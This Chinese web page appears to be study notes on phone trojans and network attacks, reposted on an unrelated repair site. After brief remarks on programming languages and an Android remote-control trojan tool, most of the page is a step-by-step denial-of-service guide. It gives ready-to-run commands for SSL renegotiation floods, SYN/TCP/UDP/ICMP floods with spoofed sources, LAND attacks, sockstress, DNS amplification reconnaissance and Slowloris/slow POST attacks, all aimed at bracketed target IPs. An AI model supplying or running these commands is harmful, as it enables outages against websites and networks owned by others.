手机木马以及移动安全 |
您所在的位置:网站首页 › 手机 木马查杀 › 手机木马以及移动安全 |
android系统:基于linux 开发语言可能会选择java 原因:应用广泛,什么地方都有java虚拟机 java ->(语言本身特点)臃肿->java虚拟机(也必然臃肿)->(虚拟机本身是C语言写的)c语言->机器语言->操作系统 苹果公司的过程: oc/swift->机器语言->操纵系统 java功能2:(做网站java web) jsp+linux+mysql/oracle/db2+tomcat 较好的组合:php+linux+nginx+mysql java功能3: jvm pc java=>jar程序 现状:被kotlin(简单!!!)语言压占市场=>jar程序 java功能4: java android java + c(用c编写.so=windows的dll文件)=>android kotlin(像python,写代码非常快)+c => android pc程序的制作选择: c#(c++++难度不高,用户多) python(超级简单)都很牛逼 Golang(c的精确度,python的快速开发,几乎啥事都能做) go语言 纠结什么语言有前途? 这个语言后台的大佬有没有钱投入? c/c++ 不可能落寞!!!全球都支持它 java 靠oracle公司支持,老旧设备 kotlin 谷歌+Intellj oc/swift 苹果公司 php 基金会,全球90%的网站都在使用 python 基金会,小部分人工智能开发/快速开发的公司 go 谷歌,区块链开发公司 c++/c#/vb 微软公司 android木马: 需要具备的环境: java环境 大多数情况,木马只需要具备: 上线,文件控制,提权(可有可无),命令执行 如果想学android开发: 不要太在意自己学的是不是java,因为android上的编程,相当于一门长得很像java的java语言 工具: Last_Version (手机远控木马控制) DOS拒绝服务攻击/DDOS分布式拒绝服务攻击(利用tcp三次握手协议缺陷) 目前这种攻击无解 一般大佬的防御(用钱) kali的更新源设置为阿里云的: /etc/apt/source.list deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib apt-get update 更新 apt-get install thc-ssl-dos 安装软件类似kali的安全审计系统 (功能比kali更强大) https://www.parrotsec.org/ DDOS操作需要的软件: thc-ssl-dos 可以打击https的网站 默认端口是443 DOS:(肉鸡多了使用同样的命令就是DDOS攻击) ssl-dos: 服务器每次会处理300次/s的ssl请求 这种攻击方法和传统攻击不一样,使用普通带宽也可以考虑打30G带宽的服务器 apt-get install thc-ssl-dos目标是打击https的网站 thc-ssl-dos [目标ip] [目标ssl端口:443] --acceptsyn flood /syn洪水攻击 apt install python-scapy apt install python3-scapy git clone https://github.com/EmreOvunc/Python-SYN-Flood-Attack-Tool.git cd Python-SYN-Flood-Attack-Tool chmod 777 ./* python3 py3_synflood_cmd.py -t 10.20.30.40 -p 8080 -c 5 //c表示number of packets 包的数量 python3 py3_SYN-Flood.py python SYN-Flood.pysockstress 针对tcp服务,耗尽目标资源,建立大量的sock连接,不消耗网络资源 完成tcp3次握手,最后ack大小为0(客户端不接收数据) 攻击者损耗很小 异步攻击,所以一台设备可以造成很大的效果 windows窗口实现流控 需要python2环境并且安装scapy sockstress.py [目标ip] [端口号] [线程] DNS流量放大攻击 发送给dns的数据包94 返回的数据包大小160+ 典型的流量放大攻击 单机带宽优势,以小汇多 利用协议的特性放大流量 apt-get install dnsutils //安装dig命令 dig ANY [目标ip(外网)] @[dns服务器地址] dig ANY qq.com @[dns的ip]利用回包判断dns服务器是否会被利用 跟很多DNS服务器发信息,让其把数据包等信息回显给要打击的目标A 这样由于返回的数据包是被放大的 也就造成了所谓的流量放大攻击 借助dnsutils来查看不同的DNS服务器其返回的数据包的大小 或者说是放大效果 之后借助收集到的信息在github上下载DNS流量放大攻击工具进行攻击即可 相似类比:NTP放大攻击 慢速攻击(打击网站有效果): apt-get install openssl apt-get install libssl-dev apt-get install slowhttptestslowhttptest 低带宽应用层慢速DOS攻击(相对于cc慢) 擅长攻击apache tomcat...服务器 耗尽应用并发的连接池,类似于http层的syn_flood http协议默认在服务端全部接收到请求之后才开始处理,如果客户发送的数据包慢速而且不完整,就会导致Dos 可以发动的攻击类型:Slowloris,slow http post攻击 Slowloris:完整的http协议结尾是\r\n\r\n,它的攻击结尾\r\n slow http post攻击:http头部content-length声明长度,但是body缓慢发送 slow http post慢速攻击(RUDY): slowhttptest -c 2000 -B -g -o body_states -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.214 -x 10 -p 3Slowloris攻击: slowhttptest -c 2000 -H -g -o my_header_states -i 10 -r 1000 -t GET -u http://192.168.1.214 -x 24 -p 3hping3 定制发送任何的数据包 -a 伪造源地址 -q 不返回 -n 不解析域名 -s 源端口 -d 字节数 -p 端口 --flood 以flood方式攻击 syn-flood hping3 -c 3000 -d 120 -S -w 64 -p 80 --flood --rand-source [目标ip] hping3 -S -P -p 80 --flood --rand-source [目标ip]tcp-flood hping3 -SARUFP -p 80 --flood --rand-source [目标ip]icmp-flood hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood [目标ip]udp-flood hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood [目标ip]LAND 特殊的syn-flood攻击 源地址和目的地址都是受害者,自己和自己完成3次握手 hping3 -n -a [目标ip] -S -d 100 -p 80 --flood [目标ip]TCP全链接DOS攻击 nping --tcp-connect --rate=10000 -c 10000000 -q [目标ip]siege发起攻击 siege -i -c 1000000 [目标ip] -A httttttpt50压力测试 网络协议支持全面 t50 -h 可以查看参数 t50 [目标网关] --flood --turbo -S --protocol TCP --dport 22 t50 --flood --protocol TCP [目标ip] --dport 80 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |